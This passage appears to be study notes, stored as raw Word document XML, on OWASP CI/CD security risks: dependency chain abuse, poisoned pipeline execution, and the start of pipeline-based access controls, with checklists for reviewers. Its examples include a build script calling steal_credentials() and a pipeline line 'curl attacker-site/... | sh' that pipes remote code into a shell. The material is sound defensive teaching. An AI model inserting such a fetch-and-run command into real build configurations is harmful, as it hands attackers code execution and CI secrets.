    <w:p w14:paraId="158938B5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5142E8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Attacker-controlled package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64809F3D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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569C2A6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Your application uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D2BD4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>example-library 1.2.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52672F78" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>The developer installs it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94E50F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> install example-library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2461D0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>But the package has been compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C961F2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>During the build, the package executes malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BF64A5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5184DEB7" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7160E4F9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D2423" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>malicious package script executes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA019F9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22113555" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>steals CI credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0937C97C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Another important example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C395817" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Your pipeline downloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF52D1D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>library.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED0ABAC" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>from an external repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46569BF5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>An attacker compromises the repository and replaces the legitimate JAR with a malicious one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A9E1DF" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Your pipeline automatically downloads it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274ACFA7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What you check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0CF083" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Where do dependencies come from? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1773D04C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are external repositories trusted? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510AAD14" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are package versions pinned? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219EBE52" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are dependencies verified? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F81266" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are package repositories controlled? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E6BF41" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can developers introduce arbitrary dependencies? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2343DF2E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are build-time dependencies also controlled? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD5B4E2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are dependency downloads happening automatically? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8945C1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Easy way to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F45B622" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-3 = Can something you depend on compromise your pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406918F5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="0DC190B0">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF4A58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4. CICD-SEC-4 — Poisoned Pipeline Execution (PPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6903D58D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>This is one of the most important ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53247C48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Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0ABE0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>An attacker manages to influence the pipeline itself so that the pipeline executes malicious commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8E826C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>The key idea is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092E3F1B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pipeline becomes the attacker's execution environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E37A86E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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48455196" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Suppose your Jenkins pipeline contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657C83A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> "python build.py"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A91FA8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>And an attacker can modify build.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4330278E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>They change it to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A3CEB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>steal_credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAFBE0A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Jenkins executes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A6817" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201807E9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F4290B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>python build.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D77C10" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BF4F53" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>attacker's code executes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1452F101" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>That's PPE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF482A3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Another example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4487CC" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Your pipeline configuration is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A7C1E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66187106" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4E332" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> run build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CE436" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>If an attacker can modify the pipeline configuration or something executed by it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524BA66F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3CE0B8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2985C378" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">  - curl attacker-site/... | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BA89728" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>the pipeline executes attacker-controlled commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB94B9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PPE can happen through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00456A15" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Modified pipeline configuration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02035830" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Malicious pull requests </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555AD186" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Untrusted branches </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1824F0B7" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Modified build scripts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C33575F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">User-controlled variables </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ABCEE0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Unsafe script execution </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322C286A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Compromised repositories </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63173775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What you check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB77240" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Ask:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A6C68E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Can untrusted code influence what the pipeline executes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C3677" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t>Check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6236E3" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can developers modify pipeline files? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0A37E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can PRs from forks execute privileged pipelines? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CECEA84" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are pipeline scripts protected? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EDD0AD" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are build scripts trusted? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B4719" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can user-controlled variables become shell commands? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53938A82" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can untrusted code access secrets? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3583CD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Easy way to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E42DD" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-4 = Can an attacker make the pipeline execute their code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C27E7A3" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="55D86702">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE1968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5. CICD-SEC-5 — Insufficient PBAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76515F4E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">PBAC = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pipeline-Based Access Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC219D7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Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73661329" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pipeline has access to resources that it doesn't actually need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA05BB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>This is slightly different from SEC-2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA97E5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SEC-2 vs SEC-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70621889" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>This distinction is very important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5432C8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SEC-2</w:t>
